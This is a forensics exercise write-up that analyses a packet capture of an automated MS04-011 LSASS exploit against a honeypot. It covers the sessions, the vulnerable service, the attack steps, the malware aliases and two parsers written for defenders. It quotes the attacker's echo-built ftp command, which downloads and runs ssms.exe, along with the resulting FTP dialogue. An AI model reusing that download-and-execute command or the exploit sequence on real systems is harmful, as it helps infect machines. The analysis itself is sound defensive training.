Tuesday, September 13, 2011

First PCAP Exercise


08-1461 FIRST PCAP EXERCISE (ANSWER)

1. Which systems (i.e. IP addresses) are involved? (2pts)

Attacker: 98.114.205.102 (Windows XP)
System being attacked: 192.150.11.111 (Linux 2.4/2.6 host)

(You can see the IP addresses in the source and destination column in Wireshark or Wireshark Statistics -> Endpoints -> IPv4)

2. What can you find out about the attacking host (e.g., where is it located)? (2pts) 

Hostname: pool-98-114-205-102.phlapa.fios.verizon.net
Country Code: US
Country Name: United States
Region: PA
Region Name: Pennsylvania
City: Southampton
Postal Code: 18966
Latitude: 40.1877
Longitude: -75.0058
ISP: Verizon Internet Services
Metro Code: 504
Area Code: 215
IP Address: 98.114.205.102
MAC Address: 0008E23B5601
ASN 19262
Subnet B - 98.114.0.0/16

(Tools used: I got these diagrams from searching for the attacker’s IP address 98.114.205.102 in http://www.robtex.com/ and http://www.maxmind.com/app/locate_demo_ip)

3. How many TCP sessions are contained in the dump file? (2pts)

There are 5 TCP sessions.

Address A        Port A               Address B        Port B
98.114.205.102   donnyworld (1821)    192.150.11.111   microsoft-ds (445)
98.114.205.102   itm-mcell-u (1828)   192.150.11.111   microsoft-ds (445)
192.150.11.111   unix-status (1957)   98.114.205.102   xiip (1924)
192.150.11.111   36296                98.114.205.102   8884
98.114.205.102   gtp-user (2152)      192.150.11.111   Socks (1080)
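To show how the session count above is obtained, here is an added example (not part of the original write-up) that collapses per-packet 4-tuples into direction-independent TCP conversations the way Wireshark's Conversations view does, and additionally flags the conversations the victim initiated. The packet list is constructed from the table above, not read from the pcap.

```python
# Added example: count TCP sessions from per-packet (src, sport, dst, dport)
# tuples and flag the ones the victim started. PACKETS is a constructed
# sample mirroring the five conversations in the capture.
from collections import OrderedDict

ATTACKER, VICTIM = "98.114.205.102", "192.150.11.111"

PACKETS = [
    (ATTACKER, 1821, VICTIM, 445), (VICTIM, 445, ATTACKER, 1821),      # SMB
    (ATTACKER, 1828, VICTIM, 445), (VICTIM, 445, ATTACKER, 1828),      # SMB
    (ATTACKER, 1924, VICTIM, 1957), (VICTIM, 1957, ATTACKER, 1924),    # bind shell
    (VICTIM, 36296, ATTACKER, 8884), (ATTACKER, 8884, VICTIM, 36296),  # FTP control
    (ATTACKER, 2152, VICTIM, 1080), (VICTIM, 1080, ATTACKER, 2152),    # FTP data
    (ATTACKER, 1821, VICTIM, 445),  # another packet of the first session
]


def session_key(src, sport, dst, dport):
    """Order the two endpoints so A->B and B->A map to the same key."""
    a, b = (src, sport), (dst, dport)
    return (a, b) if a <= b else (b, a)


def tcp_sessions(packets):
    """Map session key -> packet count, in first-seen order."""
    sessions = OrderedDict()
    for pkt in packets:
        key = session_key(*pkt)
        sessions[key] = sessions.get(key, 0) + 1
    return sessions


def victim_initiated(packets, victim=VICTIM):
    """First packet of each session, kept only if the victim sent it.

    Outbound connections from a server that should only accept connections
    (here: the FTP fetch of ssms.exe) are the ones a defender should alert on.
    """
    first = {}
    for pkt in packets:
        first.setdefault(session_key(*pkt), pkt)
    return [pkt for pkt in first.values() if pkt[0] == victim]


if __name__ == "__main__":
    for key, count in tcp_sessions(PACKETS).items():
        print(key, count)
    print("victim-initiated:", victim_initiated(PACKETS))
```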

4. How long did it take to perform the attack? (2pts) 16.219218 seconds

Time from first packet to the last packet – 16.219218 seconds
First Packet 2009-04-19 20:28:28
Last Packet 2009-04-19 20:28:44
Packets 348
Average Packet/Sec – 21.456
Average Packet Size – 527.330 bytes
Average bytes/second – 11314.417
Average Mbit/second – 0.091

5. Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)

Operating system being attacked: Windows 5.1 (XP). Evidence: see the Native OS field in frame 16.

Service being attacked: Local Security Authority Subsystem Service (LSASS)

Vulnerability: MS04-011 (LSASS buffer overflow). The specific vulnerable system component is LSASRV.DLL. The issue is present in the Active Directory service functions that are exposed through the Local Security Authority Subsystem Service (LSASS) DCE/RPC endpoint. The vulnerable functionality is reportedly accessible over the LSARPC named pipe via TCP port 445. Impact: DsRoleUpgradeDownlevelServer is executed, which leads to a buffer overflow and consequently remote code execution.


6. Can you sketch an overview of the general actions performed by the attacker? (5pts)

a. The attacker connects to port 445 and conducts a port scan.

b. The attacker connects to the IPC$ share on the system being attacked (frame 20).

20  1.073151  98.114.205.102  192.150.11.111  SMB  152  Tree Connect AndX Request, Path: \\192.150.11.111\ipc$

c. The attacker opens the \lsarpc named pipe (frame 23).

23  1.307145  98.114.205.102  192.150.11.111  SMB  158  NT Create AndX Request, FID: 0x4000, Path: \lsarpc

d. The attacker exploits the vulnerable host over port 445 by calling DsRoleUpgradeDownlevelServer() with a parameter that overflows the stack (frame 33).

33  1.805992  98.114.205.102  192.150.11.111  DSSETUP  454  DsRoleUpgradeDownlevelServer request [Long frame (3208 bytes)]

e. The shellcode executes on the attacked system and binds a shell to port 1957; the attacker then connects to this port to send the commands needed to download the malware (frame 36).

36  2.091833  98.114.205.102  192.150.11.111  TCP  62  xiip > unix-status [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM=1

Note: using Follow TCP Stream on this session you will see the command sent by the attacker:

echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe
ssms.exe

f. The system being attacked then initiates an FTP connection to the attacker and tries to download a file named ssms.exe (frame 50).

220 NzmxFtpd 0wns j0
USER 1
331 Password required
PASS 1
230 User logged in.
SYST
215 NzmxFtpd
TYPE I
200 Type set to I.
PORT 192,150,11,111,4,56
200 PORT command successful.
RETR ssms.exe
150 Opening BINARY mode data connection
QUIT
226 Transfer complete.
221 Goodbye happy r00ting.

g. Then the malware is executed (frame 68).
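The attacker's one-liner and the FTP PORT command shown in steps e and f carry everything a defender needs to describe the download: the parser below is an added example (not part of the original write-up) that reassembles the ftp script the echo chain writes to file "o", extracts the server, credentials, fetched file and the binary that is finally executed, and computes the active-mode data port from the PORT line so it can be cross-checked against the session table in question 3. The command string and PORT line are copied from the stream above; the function names are mine.

```python
# Added example: extract download indicators from the attacker's command
# and from the FTP PORT line. COMMAND and PORT_CMD are copied from the
# captured stream; the parsing logic is constructed for this write-up.
import re

COMMAND = ("echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o "
           "&echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe")
PORT_CMD = "PORT 192,150,11,111,4,56"


def parse_ftp_script(cmd):
    """Rebuild the script 'ftp -n -s:o' will run and summarise what it does."""
    # Every 'echo <text> > o' / '>> o' segment appends one line to the script.
    lines = re.findall(r"echo\s+(.*?)\s*>{1,2}\s*o\b", cmd)
    info = {"script": lines, "server": None, "port": None, "creds": None, "files": []}
    for line in lines:
        words = line.split()
        verb = words[0].lower()
        if verb == "open":
            info["server"] = words[1]
            info["port"] = int(words[2]) if len(words) > 2 else 21
        elif verb == "user":
            info["creds"] = (words[1], words[2] if len(words) > 2 else "")
        elif verb == "get":
            info["files"].append(words[1])
    # Whatever follows the ftp invocation, apart from the cleanup 'del', is executed.
    tail = cmd.split("ftp")[-1]
    info["executed"] = [p.strip() for p in tail.split("&")[1:]
                        if p.strip() and not p.strip().lower().startswith("del ")]
    return info


def parse_port_command(line):
    """Active-mode 'PORT h1,h2,h3,h4,p1,p2' -> (ip, port) the server connects back to."""
    m = re.fullmatch(r"PORT\s+(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)", line.strip())
    if not m:
        raise ValueError("not a PORT command")
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def summarize(cmd=COMMAND, port_cmd=PORT_CMD):
    """Indicators a detection rule or incident report would record."""
    s = parse_ftp_script(cmd)
    data_ip, data_port = parse_port_command(port_cmd)
    return {"control": (s["server"], s["port"]), "data": (data_ip, data_port),
            "creds": s["creds"], "dropped": s["files"], "executed": s["executed"]}


if __name__ == "__main__":
    print(summarize())
```

The computed data endpoint 192.150.11.111:1080 is the fifth conversation in the session table (Socks 1080), and the control connection to port 8884 is the fourth.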

7. What specific vulnerability was attacked? (2pts)

MS04-011 (LSASS buffer overflow). The specific vulnerable system component is LSASRV.DLL. The issue is present in the Active Directory service functions that are exposed through the Local Security Authority Subsystem Service (LSASS) DCE/RPC endpoint. The vulnerable functionality is reportedly accessible over the LSARPC named pipe via TCP port 445. Impact: DsRoleUpgradeDownlevelServer is executed, which leads to a buffer overflow and consequently remote code execution.

8. Was there malware involved? What is the name of the malware (We are not looking for a detailed malware analysis for this challenge)? (2pts)

Yes. The file downloaded from the FTP server, ssms.exe, is malware.

Aliases:
Trojan.Win32.Agent [Ikarus]
Trojan.Win32.Agent.axpp [Kaspersky Lab]
Trojan-Downloader.Win32.Banload [Ikarus]
TrojanSpy:Win32/Banker!rts [Microsoft]
W32.IRCBot.Gen [Symantec]
W32/Rbot-Fam, W32/Rbot-Gen [Sophos]
W32/Sdbot.worm.gen.g [McAfee]
Win32/IRCBot.worm.Gen [AhnLab]
Worm.RBot.Gen.6 [PC Tools]
WORM_AGENT.ASCZ [Trend Micro]

9. Do you think this is a manual or an automated attack (2pts)?  Why?

Automated, because the whole attack completes in a matter of seconds, which is too fast for a manual attack.

Bonus:

10. What actions does the shellcode perform? Please list the shellcode (10 pts)

The shellcode is a "port bind" shellcode, meaning that successful exploitation opens a listening TCP socket on the victim host and binds a command shell to it.

Unobfuscated shellcode:

Obfuscated shellcode:

